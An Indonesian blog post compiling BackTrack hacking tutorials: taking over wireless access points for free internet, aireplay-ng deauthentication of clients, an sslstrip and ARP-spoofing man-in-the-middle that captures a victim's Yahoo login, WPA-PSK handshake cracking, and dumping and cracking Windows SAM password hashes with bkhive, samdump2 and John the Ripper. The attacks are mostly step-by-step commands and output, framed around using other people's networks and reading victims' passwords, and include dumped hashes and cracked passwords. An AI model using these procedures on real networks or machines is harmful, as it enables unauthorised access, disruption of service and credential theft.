Jumat, 01 Juni 2012

AWAS!!.. Jgn Salah Scanning Access Point

Pendahuluan
Tulisan ini saya buat untuk mewakili beberapa jawaban yang banyak di pertanyakan di forum indobacktrack

Kebanyakan para Attacker tidak mengetahui persis link tersebut merupakan link yang mengadung Internet / tidak


Ada beberapa aspek yang perlu di perhatikan:

1. Pastikan link tersebut merupakan Hotspot (klo sudah hospot berarti ada internet)

2. Pastikan Access Point tersebut bukan link point to point yang hanya di peruntukan untuk transmisi data / ip saja

3. Pastikan Router / Server ICS yang terkoneksi dengan Access point terdapat service DHCP Server / dan IP yang di provide oleh DHCP server dapat dipakai internet

4. Pastikan Wireless Device anda support Scanning / klo perlu support injection

5. Perhatikan Encryption yang di gunakan dan security yang di terapkan pada access point tersebut, misal WEP 64 bit(10 angka), WEP 128 Bit, WPA, WPA-PSK, WPA2, WPA-TKIP dll


Berikut saya tampilkan diagram network yang memungkinan kita "hack" dan memakai internet gratis


Gambar 1



Gambar 2



Penjelasan :

Gambar 1
1. Gambar di atas memungkinkan agar kita dapat "menghack" link tersebut dan mendapatkan internet gratis
2. Router tersebut terdapat DHCP server dan IP Segmen 10.10.10.0/24 yang dapat di pergunakan untuk internet
3. Router Sebagai Internet Connection Sharing / NAT
4. Acces point di gunakan sebagai bridge / jembatan / penganti media kabel dari user laptop dan pc user agar dapat request DHCP ke router
5. AP client di pergunakan untuk menggantikan Wireless Device yang terdapat pada notebook (dengan tujuan tertentu , mungkin jarak PC user terlalu jauh ke access point dll)


Gambar 2
1. Link tersebut merupakan link Point To point / bisa juga link Point to Multi Point
2. Router 2 hanya untuk routing static saja
3. Router 2 hanya sebagai distribusi Ip pada router di bawahnya
4. Router 2 tidak terdapat internet walaupun terkonesi dengan router 1
5. Link Wireless digunakan sebagai penganti kabel yang menghubungkan Router 2 dan Router 3


Kesimpulan

Dari 2 gambar di atas terlihat jelas perbedaan link wireless tersebut, wlw sama2 sebagai Aceess point station dan Access point Client namun router yang menghandle di atasnya mempunya fungsi yang berbeda.

Jika anda mendapat Access Point dan terkoneksi dengan acces point seperti skema gambar 1 namun router tampa DHCP server, backtrack sudah banyak tool yang menyediakan untuk scanning traffic ip yang lewat jika anda sudah terkonesi dengan access point tersebut

Hacking Wifi di backtrack 3

Di dalam backtrack terdapat tools aircrack untuk hacking wifi, dan aircrack ini memiliki sejumlah kawan di antaranya aireplay-ng, airodump-ng, airmon-ng dan lain sebagainya.

Nah kali ini saya akan menjelaskan penggunaan dari aireplay-ng:


a
Aktifkan device wireless menjadi mode monitor


airmon-ng 

Penjelasan 
:
airmon-ng : design wireless device menjadi mode monitor
start,stop,check : [aktifkan, nonaktifkan, mengecek] wireless device berada di mode apa
interface : device wireless


Contoh
 : airmon-ng start wlan0
maka hasilnya :

Interface Chipset Driver

wlan0 Unknown iwlagn - [phy0]
(monitor mode enabled on mon0)

b
. Mematikan seluruh client

aireplay-ng - -deauth [count] -c FF:FF:FF:FF:FF:FF -a [AP MAC] device_wifi

Penjelasan
 :
- -deauth : mematikan autentikasi station
count : Jumlah / lama waktu mematikan autentikasi station, jika count yang di input sudah selesai maka seluruh client aktif kembali.


Contoh
 : aireplay-ng - -deauth 10 -c FF:FF:FF:FF:FF:FF -a [AA:BB:CCD:EE:FF] mon0


c. Mematikan satu client


aireplay-ng - -deauth [count] -c [MAC client] -a [AP MAC] device_wifi

Penjelasan
 :
- -deauth : mematikan autentikasi station
count : Jumlah / lama waktu mematikan autentikasi station, jika count yang di input sudah selesai maka seluruh client aktif kembali.


Contoh
 : aireplay-ng - -deauth 10 -c A1:B2:C3:AFF:A4 -a [AA:BB:CCD:EE:FF] mon0
Kadang perintah aireply diatas tidak bisa karena channel dari AP-nya tidak sama dengan channel device wireless, jadi ulangi perintah tersebut hingga channel AP sama dengan device wireless yang kita miliki.

sslstrip - hacking https

kali ini saya coba menjelaskan tentang hacking https connection menggunakan sslstrip..
langsung ke TKP...berikut adalah beberapa informasi mengenai jaringan :
- ip attacker : 192.168.1.50
- ip victim : 192.168.1.200
- gateway : 192.168.1.5
sekilas mengenai sslstrip :
root@h4ck:~# sslstrip --help
Code:
sslstrip 0.1 by Moxie Marlinspike
 Usage: sslstrip

Options:
 -w , --write= Specify file to log to (optional).
 -p , --post Log only SSL POSTs. (default)
 -s , --ssl Log all SSL traffic to and from server.
 -a , --all Log all SSL and HTTP traffic to and from server.
 -l , --listen= Port to listen on (default 10000).
 -f , --favicon Substitute a lock favicon on secure requests.
 -k , --killsessions Kill sessions in progress.
 -h Print this help message
Code:
note :
 -opsi -a digunakan untuk logging semua trafic ( http,https)
 -opsi -s digunakan untuk logging traficc ssl saja
 -opsi -l digunakan untuk listen port ( meredirect port 80 victim,defaultnya 10000 )
 -opsi : -w : tempat file dump akan disimpan.
1.jalankan ssl strip :

root@h4ck:~# sslstrip -a -w laharisi
2.lakukan arpspoof terhadap victim
root@h4ck:~# root@h4ck:~# arpspoof -i vmnet1 -t 192.168.1.200 192.168.1.5
akftifkan fungsi ip_forward :
root@h4ck:~# echo 1 > /proc/sys/net/ipv4/ip_forward
3.redirect komunikasi http victim ( port 80 ) ke port yang di gunakan sslstrip ( 10000)

root@h4ck:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
4. ketika victim melakukan login misalnya mail.yahoo.com,maka kita bisa melihat username dan password loginnya..caranya buka file dump ( laharisi )

root@h4ck:~# cat laharisi | grep -i "passwd="
Code:
url+="?";if(valid_js()){var passwd=form.passwd.value;var challen
 function hash2(form){var passwd=form.passwd.value
 2009-06-30 19:22:34,004 SECURE POST Data (login.yahoo.com):  .tries=1&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=&
 amp;.u=1esn43t54k0a5&.v=0&.challenge=EzdOJPTgncnTmCU_K.
  IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=bl4ck.4ngle&passwd=disembunyikan&.save=Sign+In
kita bisa melihat bahwa username = bl4ck.4ngle dan password = disembunyikan

Tutorial Cracking WPA-PSK

Sebenarnya Tutorial ini sudah sangat basi bagi kaum backtrackers, tapi ini khusus ditujukan kepada newbie yang ingin tahu tentang cara menghacking jaringan infrastructure dengan encryp WPA-PSK..agar tidak ada pertanyaan yang di ulang2 seperti yang terjadi di area pertanyaan pemula

semoga tutorial ini dapat membantu...


  • Sebagai informasi
    Tutorial ini telah dipraktekan langsung oleh saya sendiri pada jaringan warnet yang merupakan punya teman saya dan atas sepengetahuan dia...
    sengaja tidak ada yang di kaburkan supaya lebih dimengerti


    1. Siapkan CD Live Backtrack n tentunya dengan partnernya n of course sebatang rokok agar lebih santai..

    2. masuk ke dekstop dengan perintah ~# startx

    3. buka konsole dan ketikkan perintah :~# ifconfig -a




    4. :~# ifconfig wlan0 up (tuk mengaktifkan interface wlan0)




    5. :~# airmon-ng

    :~# airmon-ng start wlan0[/color] (tuk membuat virtual interface mode monitor)




    6. ~# airodump-ng mon0 (tuk memonitoring jaringan yang ada di sekitar)

    mon0 adalah interface virtual hasil dari airmon-ng tadi



    hasil dari airodump-ng mon0




    7. :~# airodump-ng -w test --channel 11 --bssid 00904c910001 mon0

    (tuk memonitoring khusus jaringan yang memiliki bssid 00:90:4C:91:00:01 pada channel 11 dan hasil dari monitoring di tulis pada file yang bernama 'test')




    8. :~# aireplay-ng -0 1 -a 00904c910001 -c oo1cbfa13fe3 mon0

    (aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking)


    -0 : mode serangan deAuthentication
    1 : dilakukan sebanyak 1x deAuth






9. setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah

:~# aircrack-ng test-01.cap -w /pentest/passwords/wordlists/inawpa.txt


inawpa.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/inawpa.txt





sebagai informasi, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya...jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang qt miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal.

SEMOGA DAPAT MEMBANTU BAGI PARA NEWBIE...
kalo ada kekurangan mohon dicerahkan.

Cracking Password Windows Via BT 4 PreFinal




Meskipun gwe seorang newbie, tapi itu gak akan menghilangkan semangat gwe untuk membuat sebuah tutorial yang bisa di share buat teman-temin semua, terlepas dari banyak kekurangan disana sini ane mohon maaf yeh , hehehe...
pertama-tama sebelum memulai gwe mau tutup dulu video miyabi unscensored gwe neh..., huahahhaa..., becanda fren........, kamsud gwe gwe selipin dulu sebatang rokok dan menyeruput kopi panas yg maknyus tenan.....,
wokeh langsung aja dah tanpa memperpanjang mukadimah alias preface....

untuk kali ini kita akan mencoba cracking password windows via backtrack 4 live CD (kamsudnya dengan booting melalui CD backtrack 4), sebetulnya tutorial ini pernah di buat oleh ncang assadotcom di JS dengan menggunakan BT 2 kalo gak salah, tapi untuk kali ini ane coba di BT 4 prefinal.


1.Pertama setting di bios anda booting dari CD


2.Kemudian masuk ke BT seperti biasa dengan perintah startx


3.kita lanjut ke tahap mengkases file windows via BT, kenapa kita mengakses data windows, yah terang aja kan kita mau ngecrack passwordnya yg terletak di direktori C://WINDOWS/system32/config/ SAM , file yg bernama SAM inilah tempat di mana windows menyembunyikan password login windows. Wokeh lalu masuk di bt console dan ikuti langkah berikut:


untuk mengakses file window dan mounting di BT

root@backtrackers:~# mountconfig
maka akan muncul tampilan Disk & FileSystem Configuration, selanjutnya di situ kita bisa lihat bahwa drive C: windows terletak di partisi 1, atau kita bisa analisa satu persatu kok. Klik di partisi tersebut lalu klik new untuk merubah mountingnya. Lalu configurasi sbb:

ode:
Type: Automatic
 Mount Point: /mnt/sda1 (kalo belum ada folder sda1 nya silahkan di buat yah)
 Device: /dev/sda1/
pastikan posisinya udah enable alias warna ijo......

selanjutnya lakukan mounting dengan perintah:

root@backtrackers:~# mount /dev/sda1 /mnt/sda1
maka drive window sudah bisa kita akses di bt
lalu lihat secara detail file windowsnya, bisa juga kita lihat di explorer nya bt dimana letak file SAM nya.

root@backtrackers:~# ls -l /mnt/sda1/WINDOWS/system32/config/SAM
Code:
-rwxrwxrwx 1 root root  262144 2009-11-10 00:17 /mnt/sda1/WINDOWS/system32/config/SAM
untuk selanjutnya windows menyembunyikan sistem proteksi file SAM nya di file yg bernama syskey yang terletak di direktori berikut:

root@backtrackers:~# ls -l /mnt/sda1/WINDOWS/system32/config
Code:
total 31916 -rwxrwxrwx 1 root root 6029312 2009-11-11 01:23 system
(karena terlalu banyak untuk di tampilkan, jadi gwe capture aja file target kita, yaitu system)

okey kita udah dapet yg namanya file system, dan untuk selanjutnya kita akan capture file syskey tersebut dan kita jadikan sebuah file dengan program yg namanya bkhive yang terletak di :
aplikasi > backtrak > privilege escalation > password attack > offline attack > bkhive

atau langsung ketik di console juga gpp, gak dosa kok ), disini nama file output yg gwe buat adalah wsyskey (buat penamaan terserah lo pada deh, mau bikin asiacarerasyskey atau tukul_syskey juga ga jadi masalah ) )


root@backtrackers:~# bkhive /mnt/sda1/WINDOWS/system32/config/system wsyskey
Code:
bkhive 1.1.1 by Objectif Securite
 http://www.objectif-securite.ch
 original author: ncuomo@studenti.unina.it

Root Key : $$$PROTO.HIV
 Default ControlSet: 001
 Bootkey: 0c7b80c915ccc01cd4e949af7ebdde90
okey kita udah berhasil membuat file syskeynya, bisa di liat kok (gwe simpern filenya di /root)

Code:
root@backtrackers:~# ls -l
 -rw-r--r-- 1 root root 16 2009-11-10 23:01 wsyskey
selanjutnya untuk melihat file yg terenkripsi didalam file system kita gunakan program samdump2
aplikasi > backtrak > privilege escalation > password attack > offline attack > samdump2

so yang artinya, jadi.., masukin perintah begono noh......, sehingga muncullah beberapa login yg ada di windows yg udah kita dump dari file sam


root@backtrackers:~# samdump2 /mnt/sda1/WINDOWS/system32/config/SAM wsyskey
Code:
samdump2 1.1.1 by Objectif Securite
 http://www.objectif-securite.ch
 original author: ncuomo@studenti.unina.it

Root Key : SAM
 Administrator:500:545a8bd6333a94aff4227b3697fb5b7c:71dd6e54afa0b12d34f6aadb93a02564:::
 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
 HelpAssistant:1000:4977de14abb666c164f9f2ff61b57ac6:2932ca40988c78b801d226c8140b6702:::
 juliaperes:1002:aad3b435b51404eeaad3b435b51404ee:ce899a3735c9489ffdc2c48df3ed6fdd:::
 vinblackganteng:1003:85fcfffed6e0e9fcb75e0c8d76954a50:b33902ac5aacd0a02af58e900fa594a5:::
sekanjutnya...., eh sori.., selanjutnya kamsudnya....., kita rubah file wsyskey tadi menjadi file hash dalam ekstensi .txt , selanjutnya filenya ane kasih nama whash.txt

root@backtrackers:~# samdump2 /mnt/sda1/WINDOWS/system32/config/SAM wsyskey > whash.txt
Code:
samdump2 1.1.1 by Objectif Securite
 http://www.objectif-securite.ch
 original author: ncuomo@studenti.unina.it

Root Key : SAM
lalu liat kembali apa file tersebut udah jadi apa belon.....
Code:
 root@backtrackers:~# ls -l
 total 162944 -rw-r--r-- 1 root root 431 2009-11-10 23:05 whash.txt
nah lo udah ngonol...eh nongol dia...... ) , lalu liat isinya dengan perintah cat

root@backtrackers:~# cat whash.txt
Code:
Administrator:500:545a8bd6333a94aff4227b3697fb5b7c:71dd6e54afa0b12d34f6aadb93a02564:::
 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
 HelpAssistant:1000:4977de14abb666c164f9f2ff61b57ac6:2932ca40988c78b801d226c8140b6702:::
 juliaperes:1002:aad3b435b51404eeaad3b435b51404ee:ce899a3735c9489ffdc2c48df3ed6fdd:::
 vinblackganteng:1003:85fcfffed6e0e9fcb75e0c8d76954a50:b33902ac5aacd0a02af58e900fa594a5:::
nah udah nongol lagi dah.., file2 user login dengan enkripsi hash nya, dan untuk selanjutnya kita akan crack file hash tersebut dengan program di bt4 prefinal yg namanya john (bukan john banting yah ,, hehehe) yang ada di
aplikasi > backtrak > privilege escalation > password attack > offline attack > john

Code:
 root@backtrackers:/pentest/passwords/jtr# ./john /root/whash.txt
sehingga si bang john akan mengcrack file hash yg ada di file whash.txt tersebut yang kemudian menampilkan password windows tersebut, dalam proses crackingnya program ini seolah2 seperti hang, padahal dia sedang melakukan bruteforce terhadap file tersebut sehingga jika kita tidak akan menunggu lebih lama kita tekan aja control c untuk men setop prosesnya.
Karena bang john tidak bisa membedakan huruf besar kecil dan besar maka kita lihat file yg di simpen bang john di direktori dia sendiri yaitu

root@backtrackers:~# cat /pentest/passwords/jtr/john.pot
Code:
$1$xd5xuJYT$x6un0Ho.gXVCv4ZduhsYQ.:toor
 $LM$aad3b435b51404ee:
 $LM$f4227b3697fb5b7c:SEKSI
 $LM$b75e0c8d76954a50:GANTENG123

dan yang terkahir setelah kita lihat di direktori bang john kembali kita tampilkan file pamungkas dengan perintah cat

root@backtrackers:/pentest/passwords/jtr# ./john --show /root/whash.txt
maka terlihatlah password untuk
vinblackganteng: ganteng123
juliaperes: SEKSI


NB:
1. untuk proses crackingnya terkadang penggunaan password yg panjang dan multikarakter sepertinya bang john cukup kesulitan atau memakan waktu lama (perasaan ane sih, mungkin ada temen2 laen yg punya teknik sendiri atau solusi, yang jelas file hash nya udah kita dapetin)
2. dalam proses cracking ini bang john tidak akan mengulangi lagi terhadap file yang udah di cracknya, jadi walaupun kita mengulanginya sampai 10 kali, si john tetap pada pendiriannya yaitu cracking yg pertama.